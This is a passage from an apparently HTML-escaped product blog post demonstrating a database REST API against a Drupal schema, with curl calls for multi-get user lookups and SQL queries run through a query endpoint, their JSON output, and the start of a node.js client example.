&lt;span class='go'&gt;                &amp;quot;location&amp;quot;: &amp;quot;aHR0cDovL2VjMi01MC0xOS0yOC0yNy5jb21wdXRlLTEuYW1hem9uYXdzLmNvbS9kcnVwYWwv&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;referer&amp;quot;: &amp;quot;aHR0cDovL2VjMi01MC0xOS0yOC0yNy5jb21wdXRlLTEuYW1hem9uYXdzLmNvbS9kcnVwYWwv&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;hostname&amp;quot;: &amp;quot;24.61.45.238&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;timestamp&amp;quot;: 1355406786&lt;/span&gt;
&lt;span class='go'&gt;            }&lt;/span&gt;
&lt;span class='go'&gt;        ]&lt;/span&gt;
&lt;span class='go'&gt;    }&lt;/span&gt;
&lt;span class='go'&gt;]&lt;/span&gt;
&lt;span class='gp'&gt;$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We also support multi-get so you can retrieve a number of table groups in a single REST API call. For example, lets say I want to get information on 2 users:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;$&lt;/span&gt; curl -X GET -H &lt;span class='s2'&gt;&amp;quot;Content-Type: application/json&amp;quot;&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/drupal.users/11467;10503&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;[&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 11467,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;clibriprofr&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pass&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;clibriprofr@default&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;theme&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;signature&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;signature_format&amp;quot;: null,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355360324,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;access&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;login&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;timezone&amp;quot;: null,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;picture&amp;quot;: 11463,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;init&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;data&amp;quot;: null,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.authmap&amp;quot;: [],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.sessions&amp;quot;: [],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.shortcut_set_users&amp;quot;: [],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.users_roles&amp;quot;: [],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.watchdog&amp;quot;: []&lt;/span&gt;
&lt;span class='go'&gt;    },&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 10503,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;uuslosuwr&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pass&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;uuslosuwr@default&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;theme&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;signature&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;signature_format&amp;quot;: null,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355360324,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;access&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;login&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;timezone&amp;quot;: null,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;picture&amp;quot;: 10499,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;init&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;data&amp;quot;: null,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.authmap&amp;quot;: [],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.sessions&amp;quot;: [],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.shortcut_set_users&amp;quot;: [],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.users_roles&amp;quot;: [],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.watchdog&amp;quot;: []&lt;/span&gt;
&lt;span class='go'&gt;    }&lt;/span&gt;
&lt;span class='go'&gt;]&lt;/span&gt;
&lt;span class='gp'&gt;$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Our REST API also supports aribtrary SQL queries being executed and results being returned as JSON. Lets try a simple example first:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;$&lt;/span&gt; curl -X GET -H &lt;span class='s2'&gt;&amp;quot;Content-Type: application/json&amp;quot;&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/query?q=select%20count(*)%20from%20drupal.comment&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;[&lt;/span&gt;
&lt;span class='go'&gt;{&amp;quot;_SQL_COL_1&amp;quot;:252462}&lt;/span&gt;
&lt;span class='go'&gt;]&lt;/span&gt;
&lt;span class='gp'&gt;$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Another example of executing arbitrary SQL queries through our REST API with a more complex query follows. The query we will use for this example is:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='sql'&gt;&lt;span class='k'&gt;SELECT&lt;/span&gt; &lt;span class='k'&gt;c&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='o'&gt;*&lt;/span&gt; 
&lt;span class='k'&gt;FROM&lt;/span&gt;   &lt;span class='n'&gt;drupal&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='k'&gt;comment&lt;/span&gt; &lt;span class='k'&gt;c&lt;/span&gt; 
       &lt;span class='k'&gt;INNER&lt;/span&gt; &lt;span class='k'&gt;JOIN&lt;/span&gt; &lt;span class='n'&gt;drupal&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;node&lt;/span&gt; &lt;span class='n'&gt;n&lt;/span&gt; 
               &lt;span class='k'&gt;ON&lt;/span&gt; &lt;span class='n'&gt;n&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='k'&gt;c&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt; 
&lt;span class='k'&gt;WHERE&lt;/span&gt;  &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='k'&gt;c&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;status&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='mi'&gt;1&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; 
       &lt;span class='k'&gt;AND&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;n&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;status&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='mi'&gt;1&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; 
&lt;span class='k'&gt;ORDER&lt;/span&gt;  &lt;span class='k'&gt;BY&lt;/span&gt; &lt;span class='k'&gt;c&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;created&lt;/span&gt; &lt;span class='k'&gt;DESC&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; 
          &lt;span class='k'&gt;c&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;cid&lt;/span&gt; &lt;span class='k'&gt;DESC&lt;/span&gt; 
&lt;span class='k'&gt;LIMIT&lt;/span&gt;  &lt;span class='mi'&gt;10&lt;/span&gt; &lt;span class='k'&gt;offset&lt;/span&gt; &lt;span class='mi'&gt;0&lt;/span&gt; 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Running this query through our REST API and the result (again, nicely formatted) looks like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;curl -X GET -H &amp;quot;Content-Type: application/json&amp;quot; &amp;quot;http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/query?q=SELECT%20c.*%20FROM%20drupal.comment%20c%20INNER%20JOIN%20drupal.node%20n%20ON%20n.nid%20=%20c.nid%20WHERE%20(c.status%20=%201)%20AND%20(n.status%20=%201)%20ORDER%20BY%20c.created%20DESC,%20c.cid%20DESC%20LIMIT%2010%20OFFSET%200&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;[&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;cid&amp;quot;: 304562,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pid&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;nid&amp;quot;: 93450,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;subject&amp;quot;: &amp;quot;this is a test comment&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;hostname&amp;quot;: &amp;quot;75.147.9.1&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355418376,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;changed&amp;quot;: 1355418376,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;thread&amp;quot;: &amp;quot;01/&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;posulliv&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;homepage&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;    },&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;cid&amp;quot;: 304561,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pid&amp;quot;: 304558,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;nid&amp;quot;: 93451,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 3636,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;subject&amp;quot;: &amp;quot;Defui Enim Gemino Luctus Occuro Paulatim&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;hostname&amp;quot;: &amp;quot;127.0.0.1&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;changed&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;thread&amp;quot;: &amp;quot;01.00/&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;devel generate&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;devel_generate@example.com&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;homepage&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;    },&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;cid&amp;quot;: 304560,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pid&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;nid&amp;quot;: 93451,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 3633,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;subject&amp;quot;: &amp;quot;Abdo Ea Sudo Veniam Vulputate&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;hostname&amp;quot;: &amp;quot;127.0.0.1&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;changed&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;thread&amp;quot;: &amp;quot;03/&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;devel generate&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;devel_generate@example.com&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;homepage&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;    },&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;cid&amp;quot;: 304559,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pid&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;nid&amp;quot;: 93451,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 3651,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;subject&amp;quot;: &amp;quot;Defui Euismod Letalis Nisl Utinam Vicis&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;hostname&amp;quot;: &amp;quot;127.0.0.1&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;changed&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;thread&amp;quot;: &amp;quot;02/&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;devel generate&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;devel_generate@example.com&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;homepage&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;    },&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;cid&amp;quot;: 304558,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pid&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;nid&amp;quot;: 93451,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 3657,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;subject&amp;quot;: &amp;quot;Similis Te&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;hostname&amp;quot;: &amp;quot;127.0.0.1&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;changed&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;thread&amp;quot;: &amp;quot;01/&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;devel generate&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;devel_generate@example.com&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;homepage&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;    },&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;cid&amp;quot;: 304557,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pid&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;nid&amp;quot;: 93448,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 3630,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;subject&amp;quot;: &amp;quot;Loquor Modo Ut&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;hostname&amp;quot;: &amp;quot;127.0.0.1&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;changed&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;thread&amp;quot;: &amp;quot;02/&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;devel generate&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;devel_generate@example.com&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;homepage&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;    },&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;cid&amp;quot;: 304556,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pid&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;nid&amp;quot;: 93448,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 3648,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;subject&amp;quot;: &amp;quot;Abico Conventio Elit Quis&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;hostname&amp;quot;: &amp;quot;127.0.0.1&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;changed&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;thread&amp;quot;: &amp;quot;01/&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;devel generate&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;devel_generate@example.com&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;homepage&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;    },&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;cid&amp;quot;: 304555,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pid&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;nid&amp;quot;: 93447,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 3646,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;subject&amp;quot;: &amp;quot;Dolor Immitto Metuo Veniam&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;hostname&amp;quot;: &amp;quot;127.0.0.1&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;changed&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;thread&amp;quot;: &amp;quot;04/&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;devel generate&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;devel_generate@example.com&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;homepage&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;    },&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;cid&amp;quot;: 304554,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pid&amp;quot;: 304553,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;nid&amp;quot;: 93447,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 3633,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;subject&amp;quot;: &amp;quot;Defui Et Pertineo Premo Usitas&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;hostname&amp;quot;: &amp;quot;127.0.0.1&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;changed&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;thread&amp;quot;: &amp;quot;01.00.00/&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;devel generate&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;devel_generate@example.com&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;homepage&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;    },&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;cid&amp;quot;: 304553,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pid&amp;quot;: 304550,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;nid&amp;quot;: 93447,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 3655,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;subject&amp;quot;: &amp;quot;Amet Gravis Inhibeo Roto Torqueo&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;hostname&amp;quot;: &amp;quot;127.0.0.1&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;changed&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;thread&amp;quot;: &amp;quot;01.00/&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;devel generate&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;devel_generate@example.com&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;homepage&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;    }&lt;/span&gt;
&lt;span class='go'&gt;]&lt;/span&gt;
&lt;span class='gp'&gt;$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Finally, I&amp;#8217;d like to mention we have a &lt;a href='https://github.com/akiban/akiban-rest-js'&gt;client&lt;/a&gt; for &lt;code&gt;node.js&lt;/code&gt; that can be used with our REST interface. To get information on the schemas in this server and the grouping in the drupal schema, some code using this client would look as follows:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='js'&gt;&lt;span class='err'&gt;#&lt;/span&gt;&lt;span class='o'&gt;!&lt;/span&gt;&lt;span class='err'&gt;/usr/bin/env coffee&lt;/span&gt;

&lt;span class='nx'&gt;ak&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='nx'&gt;require&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;./lib/akiban_rest.js&amp;#39;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
&lt;span class='nx'&gt;_&lt;/span&gt;  &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='nx'&gt;require&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;underscore&amp;#39;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;

&lt;span class='nx'&gt;log&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;msg&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='o'&gt;-&amp;gt;&lt;/span&gt;
  &lt;span class='p'&gt;()&lt;/span&gt; &lt;span class='o'&gt;-&amp;gt;&lt;/span&gt;
    &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;========&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;msg&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;--------&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
